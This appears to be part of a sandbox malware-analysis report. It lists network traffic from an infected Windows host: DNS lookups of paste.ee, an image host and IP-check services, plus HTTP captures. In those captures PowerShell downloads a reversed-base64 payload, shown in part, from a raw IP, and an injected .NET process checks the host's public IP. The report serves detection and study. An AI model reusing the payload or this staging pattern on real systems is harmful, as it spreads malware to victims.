Jun 14, 2024 15:15:26.944677114 CEST	54305	80	192.168.2.8	208.95.112.1
Jun 14, 2024 15:15:26.946124077 CEST	54306	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:26.946163893 CEST	443	54306	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:26.946311951 CEST	54306	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:26.950223923 CEST	80	54305	208.95.112.1	192.168.2.8
Jun 14, 2024 15:15:26.950298071 CEST	54305	80	192.168.2.8	208.95.112.1
Jun 14, 2024 15:15:26.950911045 CEST	54306	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:26.950925112 CEST	443	54306	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:27.557929039 CEST	443	54306	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:27.558012009 CEST	54306	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:27.560188055 CEST	54306	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:27.560195923 CEST	443	54306	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:27.560446978 CEST	443	54306	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:27.562014103 CEST	54306	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:27.562083006 CEST	54306	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:27.562127113 CEST	443	54306	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:28.116264105 CEST	443	54306	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:28.116446972 CEST	443	54306	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:28.116560936 CEST	54306	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:28.117130995 CEST	54306	443	192.168.2.8	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 14, 2024 15:15:00.275892019 CEST	60875	53	192.168.2.8	1.1.1.1
Jun 14, 2024 15:15:00.286645889 CEST	53	60875	1.1.1.1	192.168.2.8
Jun 14, 2024 15:15:03.947308064 CEST	49919	53	192.168.2.8	1.1.1.1
Jun 14, 2024 15:15:03.958914042 CEST	53	49919	1.1.1.1	192.168.2.8
Jun 14, 2024 15:15:16.027129889 CEST	61518	53	192.168.2.8	1.1.1.1
Jun 14, 2024 15:15:16.045623064 CEST	53	61518	1.1.1.1	192.168.2.8
Jun 14, 2024 15:15:20.747736931 CEST	53	57045	1.1.1.1	192.168.2.8
Jun 14, 2024 15:15:23.819113970 CEST	64956	53	192.168.2.8	1.1.1.1
Jun 14, 2024 15:15:23.827912092 CEST	53	64956	1.1.1.1	192.168.2.8
Jun 14, 2024 15:15:25.274831057 CEST	61409	53	192.168.2.8	1.1.1.1
Jun 14, 2024 15:15:25.284375906 CEST	53	61409	1.1.1.1	192.168.2.8
Jun 14, 2024 15:15:26.240533113 CEST	63059	53	192.168.2.8	1.1.1.1
Jun 14, 2024 15:15:26.249100924 CEST	53	63059	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 14, 2024 15:15:00.275892019 CEST	192.168.2.8	1.1.1.1	0xf2fe	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:03.947308064 CEST	192.168.2.8	1.1.1.1	0x3232	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:16.027129889 CEST	192.168.2.8	1.1.1.1	0xb860	Standard query (0)	whatismyipaddressnow.co	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:23.819113970 CEST	192.168.2.8	1.1.1.1	0x3d6f	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:25.274831057 CEST	192.168.2.8	1.1.1.1	0xfa1	Standard query (0)	75.103.13.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jun 14, 2024 15:15:26.240533113 CEST	192.168.2.8	1.1.1.1	0x8d11	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 14, 2024 15:15:00.286645889 CEST	1.1.1.1	192.168.2.8	0xf2fe	No error (0)	paste.ee		188.114.97.3	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:00.286645889 CEST	1.1.1.1	192.168.2.8	0xf2fe	No error (0)	paste.ee		188.114.96.3	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:03.958914042 CEST	1.1.1.1	192.168.2.8	0x3232	No error (0)	uploaddeimagens.com.br		188.114.97.3	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:03.958914042 CEST	1.1.1.1	192.168.2.8	0x3232	No error (0)	uploaddeimagens.com.br		188.114.96.3	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:16.045623064 CEST	1.1.1.1	192.168.2.8	0xb860	No error (0)	whatismyipaddressnow.co		188.114.96.3	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:16.045623064 CEST	1.1.1.1	192.168.2.8	0xb860	No error (0)	whatismyipaddressnow.co		188.114.97.3	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:23.827912092 CEST	1.1.1.1	192.168.2.8	0x3d6f	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:23.827912092 CEST	1.1.1.1	192.168.2.8	0x3d6f	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Jun 14, 2024 15:15:25.284375906 CEST	1.1.1.1	192.168.2.8	0xfa1	Name error (3)	75.103.13.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jun 14, 2024 15:15:26.249100924 CEST	1.1.1.1	192.168.2.8	0x8d11	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

whatismyipaddressnow.co

93.123.39.71

icanhazip.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	93.123.39.71	80	7908	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 15:15:13.835041046 CEST	71	OUT	GET /sword.txt HTTP/1.1 Host: 93.123.39.71 Connection: Keep-Alive
Jun 14, 2024 15:15:15.517054081 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Thu, 13 Jun 2024 19:52:12 GMT Accept-Ranges: bytes ETag: "743fe92ecbbdda1:0" Server: Microsoft-IIS/10.0 Date: Fri, 14 Jun 2024 13:15:14 GMT Content-Length: 75096 Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+gPAAAADAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jun 14, 2024 15:15:15.517138004 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 54 65 73 4a 57 62 6c 4e 33 63 68 39 43 50 4b 30 67 50 76 5a 6d 62 4a 52 33 63 31 4a 48 64 76 77 44 49 67 6f 51 44 2b 6b 48 64 70 4a 58 64 6a 56 32 63 76 77 44 49 67 41 43 49 4b 30 Data Ascii: AAAAAAAAAAAAAAAAAAAAA4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lmcQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3
Jun 14, 2024 15:15:15.517174006 CEST	1236	IN	Data Raw: 77 41 67 4d 41 41 43 41 70 43 41 41 41 51 48 41 6f 42 77 5a 41 6b 47 41 79 42 51 65 41 41 48 41 76 42 77 51 41 77 47 41 68 42 77 5a 41 55 47 41 4d 42 51 41 41 49 43 41 6f 42 41 41 41 41 41 41 6c 42 41 65 41 55 47 41 75 41 51 62 41 4d 48 41 70 42 Data Ascii: wAgMAACApCAAAQHAoBwZAkGAyBQeAAHAvBwQAwGAhBwZAUGAMBQAAICAoBAAAAAAlBAeAUGAuAQbAMHApBgbAQDApBgcAQDA0BQaAwGApBAdAUFAAAQZA0GAhBgTAwGAhBgbAIHAlBAdA4GAJBQAAMBAGBAAAkDA2AgLAcDAyAgLAADAuAANAAAAAAgbA8GApBwcAIHAlBgVAUGAsBQaAYEABAgCAQDAAAAAA0GAzBQaA4GA0AQ
Jun 14, 2024 15:15:15.517206907 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jun 14, 2024 15:15:15.517245054 CEST	1236	IN	Data Raw: 42 45 52 45 56 77 51 41 52 45 52 46 46 45 51 45 52 55 68 41 42 45 52 45 56 67 41 43 74 43 6f 45 62 63 51 55 4f 34 51 41 67 51 41 43 4d 55 51 45 42 45 52 45 56 49 67 43 42 45 52 45 56 49 67 42 48 45 42 43 46 30 52 6e 41 4b 52 6d 41 4b 52 6d 41 4b Data Ascii: BEREVwQARERFFEQERUhABEREVgACtCoEbcQUO4QAgQACMUQEBEREVIgCBEREVIgBHEBCF0RnAKRmAKRmAKBCBEREVIADBEREVIQBREQERUhAFEQERUhAFEQERUhAFEQERUhAGEQERUhCBEREVoQARERFF0RFHQUBdAAIEEKgSEQAgYQpAGRoAKRACASCF0RABASBIggCBEREVIQDBEREVIgBHAhDIEAAEggDd0QARERFCwQARER
Jun 14, 2024 15:15:15.517282009 CEST	1236	IN	Data Raw: 43 41 53 42 49 45 51 41 41 51 41 44 42 45 41 41 45 55 51 45 41 41 41 42 47 41 41 41 44 49 41 41 41 4d 51 42 41 41 77 41 4f 34 51 41 41 51 51 44 42 45 41 49 45 34 51 42 64 45 41 41 46 67 41 41 67 4d 51 41 41 41 77 41 4f 67 42 47 43 41 51 42 4f 67 Data Ascii: CASBIEQAAQADBEAAEUQEAAABGAAADIAAAMQBAAwAO4QAAQQDBEAIE4QBdEAAFgAAgMQAAAwAOgBGCAQBOgRAAQACAAwAOAAADEAAgMQBREQAgUgABEAIEwAAgMQBRAAIEkI40khVcp3tI0AAgMgCAAyAE8AAAQACIgACI4gDGAQCAIz4bZUNAq8tKB1Fb+qCN3CAAgHAUCQnAkIA8BghAMGASCwpAIIAhBwkAkHAYCAeAQJA1BA
Jun 14, 2024 15:15:15.517318010 CEST	1236	IN	Data Raw: 41 51 4b 41 51 44 67 72 41 73 4e 41 34 43 51 71 41 59 4d 41 56 44 67 7a 41 38 4d 41 38 43 41 32 41 6b 4d 41 53 43 77 73 41 63 4c 41 34 43 51 7a 41 51 4c 41 59 44 51 7a 41 63 4b 41 33 43 41 70 41 73 4a 41 62 44 41 78 41 77 4d 41 58 43 77 32 41 59 Data Ascii: AQKAQDgrAsNA4CQqAYMAVDgzA8MA8CA2AkMASCwsAcLA4CQzAQLAYDQzAcKA3CApAsJAbDAxAwMAXCw2AYMAYDwlAQJAFDA3AgLAPDQxA0MA0CQuAsLAZDgzAkLAHDg1AALA6CwwAIJAoCQqAMMAVCwmAsNAuCAmA8KAqCQxAIJA0CgqAMc4AGAAuBggAgIALCAoA8HAICgiAEGADCQiAIIArCQnAEGAJCQYAcIAjBwipEAAKCg
Jun 14, 2024 15:15:15.517353058 CEST	1236	IN	Data Raw: 6c 64 58 5a 7a 46 6d 65 6c 52 47 41 35 39 6d 62 31 35 57 59 36 42 51 65 76 64 32 62 35 6c 57 63 31 6c 58 59 79 56 6d 5a 68 52 48 41 35 39 6d 5a 6c 68 32 62 72 56 47 62 70 5a 57 59 79 56 33 63 41 6b 48 62 69 31 57 5a 7a 4e 58 51 6e 35 57 61 30 56 Data Ascii: ldXZzFmelRGA59mb15WY6BQevd2b5lWc1lXYyVmZhRHA59mZlh2brVGbpZWYyV3cAkHbi1WZzNXQn5Wa0V3YlhXR0V2RAkHbi1WZzNXQn5WasxWYDRXZHBQepZXYuFGbhRXai9GZhdWdkFGaAkXa0BQepFHA5lWb1RWZ5BQepdWZu9Welp2brBQepdWYuFWbhdWdmVHdpRHA5VmchNWas9mYvp2bm9Gc1B3bnBQehJncBJXYoN0
Jun 14, 2024 15:15:15.517388105 CEST	248	IN	Data Raw: 51 4a 55 51 4a 39 47 62 56 56 45 55 58 70 31 52 56 52 46 41 30 68 58 5a 55 35 53 62 6c 52 33 63 35 4e 46 41 30 56 48 65 31 5a 58 64 32 46 6d 62 68 31 47 41 30 56 48 63 30 56 33 62 33 46 47 64 31 52 57 59 6a 56 48 63 76 6c 58 64 77 39 32 59 41 51 Data Ascii: QJUQJ9GbVVEUXp1RVRFA0hXZU5SblR3c5NFA0VHe1ZXd2Fmbh1GA0VHc0V3b3FGd1RWYjVHcvlXdw92YAQXdwRXdvZ3boV2alRWYyFmb1ZXaoBAd1BHd19Gdph2b2Vmcl5WY6lWbpRGA0VHc0V3by92chtWZrVmdhNHA0VHc0V3buFWc1ZWdoBAd1BHd192aphXaqFmahp2boF2ahRWd6VHcAQXdwRXdvpWZkBAd1BHd19mZpRW
Jun 14, 2024 15:15:15.517420053 CEST	1236	IN	Data Raw: 6c 5a 58 61 32 6c 47 63 6c 68 57 61 69 46 6d 59 41 51 58 64 77 52 58 64 76 4e 57 59 77 39 32 59 6c 4e 57 64 6b 6c 6d 63 41 51 58 64 77 35 57 61 36 6c 32 63 41 51 58 64 77 35 57 61 35 39 47 62 31 4e 57 5a 6a 39 32 64 68 5a 57 59 71 6c 32 5a 41 51 Data Ascii: lZXa2lGclhWaiFmYAQXdwRXdvNWYw92YlNWdklmcAQXdw5Wa6l2cAQXdw5Wa59Gb1NWZj92dhZWYql2ZAQXdw5Wa59GZhdWZtBAd1BnbpdXa39mahJGA0VHcul2c1hHA0VHculmcltWa5lGalpWZt9mb1J3brV3cAQXdw5Was9mZlNXdrBAd1BnbphWZ092clRXY29GapNXY6BAd1BnbpZWasBAd1BnbpRWa3BAd112bsF2Z1FX
Jun 14, 2024 15:15:15.517538071 CEST	1236	IN	Data Raw: 4b 56 56 53 41 49 58 64 35 42 67 63 31 68 58 59 36 46 6d 65 41 49 58 64 75 42 67 63 76 70 58 5a 6e 56 57 63 41 49 33 62 30 4e 32 59 75 41 67 63 76 52 33 59 75 41 67 63 76 52 58 59 79 56 47 64 70 68 58 64 33 39 6d 64 76 5a 57 64 36 56 33 63 31 68 Data Ascii: KVVSAIXd5Bgc1hXY6FmeAIXduBgcvpXZnVWcAI3b0N2YuAgcvR3YuAgcvRXYyVGdphXd39mdvZWd6V3c1hWaoF2ahxGAy9GdhJXZ0l2d1lXa3FGdlRXak9GelpHAy9GdhJXZ0lmdpRHAy9GdhJXZ0lmdlRXY2lmbll3byBgcvRXYyVGdpJXd0BgcvRXYyVGdpFXZqBgcvRXYyVGdpxWdzFWc1d3b0l2cvFXauBgcvRXYyVGdptW
Jun 14, 2024 15:15:15.517573118 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Thu, 13 Jun 2024 19:52:12 GMT Accept-Ranges: bytes ETag: "743fe92ecbbdda1:0" Server: Microsoft-IIS/10.0 Date: Fri, 14 Jun 2024 13:15:14 GMT Content-Length: 75096 Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+gPAAAADAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jun 14, 2024 15:15:15.517740965 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Thu, 13 Jun 2024 19:52:12 GMT Accept-Ranges: bytes ETag: "743fe92ecbbdda1:0" Server: Microsoft-IIS/10.0 Date: Fri, 14 Jun 2024 13:15:14 GMT Content-Length: 75096 Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+gPAAAADAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	54304	104.16.185.241	80	8168	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Jun 14, 2024 15:15:23.841526985 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jun 14, 2024 15:15:25.230618000 CEST	537	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:24 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=Qcbdn6cgH8KRPIsE1GCLHD5hGBokq_GF8fUgmltKZa8-1718370924-1.0.1.1-3ZClOqvk9IWb21_9Sa2OjX4LAentKuw_V_ejlYIEfk2jdKJ1rJQ7Hc7JU5f8qUU9CWo..XFkdXoP4uyXA2ZuYw; path=/; expires=Fri, 14-Jun-24 13:45:24 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 893a96c558446b32-DFW alt-svc: h3=":443"; ma=86400 Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0a Data Ascii: 173.254.250.91
Jun 14, 2024 15:15:25.230986118 CEST	537	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:24 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=Qcbdn6cgH8KRPIsE1GCLHD5hGBokq_GF8fUgmltKZa8-1718370924-1.0.1.1-3ZClOqvk9IWb21_9Sa2OjX4LAentKuw_V_ejlYIEfk2jdKJ1rJQ7Hc7JU5f8qUU9CWo..XFkdXoP4uyXA2ZuYw; path=/; expires=Fri, 14-Jun-24 13:45:24 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 893a96c558446b32-DFW alt-svc: h3=":443"; ma=86400 Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0a Data Ascii: 173.254.250.91
Jun 14, 2024 15:15:25.231199026 CEST	537	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:24 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=Qcbdn6cgH8KRPIsE1GCLHD5hGBokq_GF8fUgmltKZa8-1718370924-1.0.1.1-3ZClOqvk9IWb21_9Sa2OjX4LAentKuw_V_ejlYIEfk2jdKJ1rJQ7Hc7JU5f8qUU9CWo..XFkdXoP4uyXA2ZuYw; path=/; expires=Fri, 14-Jun-24 13:45:24 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 893a96c558446b32-DFW alt-svc: h3=":443"; ma=86400 Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0a Data Ascii: 173.254.250.91

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
